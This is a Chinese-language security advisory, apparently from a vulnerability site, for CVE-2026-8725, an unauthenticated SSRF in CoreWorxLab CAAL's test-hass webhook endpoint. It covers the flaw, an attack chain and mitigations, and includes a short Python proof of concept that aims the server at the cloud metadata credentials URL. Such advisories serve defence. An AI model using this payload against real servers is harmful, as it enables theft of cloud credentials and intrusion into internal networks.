IPBUF安全漏洞报告
English
CVE-2026-8725 CVSS 7.3 高危

CVE-2026-8725 CoreWorxLab CAAL 服务端请求伪造漏洞

披露日期: 2026-05-17

漏洞信息

漏洞编号
CVE-2026-8725
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
CoreWorxLab CAAL

相关标签

SSRFCoreWorxLabCAALCVE-2026-8725Web安全高危漏洞

漏洞概述

CoreWorxLab CAAL 1.6.0及之前版本中存在严重的安全漏洞。该漏洞源于src/caal/webhooks.py文件中test-hass端点对用户输入处理不当,导致服务端请求伪造(SSRF)。由于无需身份认证,攻击者可远程发起攻击,操控服务器向内网或外部资源发送请求。目前利用代码已公开,且厂商尚未提供修复方案,风险较高。

技术细节

该漏洞核心位于CoreWorxLab CAAL组件的src/caal/webhooks.py文件,具体受影响的是test-hass端点。由于该函数未对传入的URL参数进行充分过滤和校验,攻击者可以构造包含恶意URL的请求发送至服务器。服务器在解析并执行该请求时,会向攻击者指定的目标发起连接,从而实现SSRF攻击。攻击者可利用此漏洞扫描内网端口、访问本地元数据服务(如AWS/GCP元数据接口)或结合其他漏洞进行进一步渗透。鉴于CVSS 3.1评分为7.3(高危),且无需用户交互,建议尽快采取缓解措施。

攻击链分析

STEP 1
侦察
攻击者发现目标服务器运行CoreWorxLab CAAL且版本低于等于1.6.0,并识别出test-hass端点。
STEP 2
漏洞利用
攻击者向test-hass端点发送特制的HTTP请求,其中包含恶意的内部URL(如元数据服务地址)。
STEP 3
SSRF执行
服务器端解析请求,向攻击者指定的内部地址发起连接,并将响应返回给攻击者。
STEP 4
数据窃取
攻击者利用获取的内部信息(如云凭证)进一步横向移动或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-8725 PoC for CoreWorxLab CAAL SSRF # Target: test-hass endpoint in webhooks.py target_url = "http://target-ip:port/test-hass" # Replace with actual target # Example payload attempting to access internal metadata # Common SSRF test targets: localhost, 127.0.0.1, cloud metadata IPs ssrf_payload = { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } try: print(f"[*] Sending SSRF payload to {target_url}...") response = requests.post(target_url, json=ssrf_payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response for sensitive data:") print(response.text) else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}")

影响范围

CoreWorxLab CAAL <= 1.6.0

防御指南

临时缓解措施
由于厂商尚未响应,建议暂时禁用src/caal/webhooks.py中的test-hass端点功能,或者通过反向代理(如Nginx)阻断对该路径的外部访问。同时,应严格隔离应用服务器的网络环境,禁止其直接访问互联网或敏感的内网段(如127.0.0.1、169.254.169.254等),以降低SSRF被利用后的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表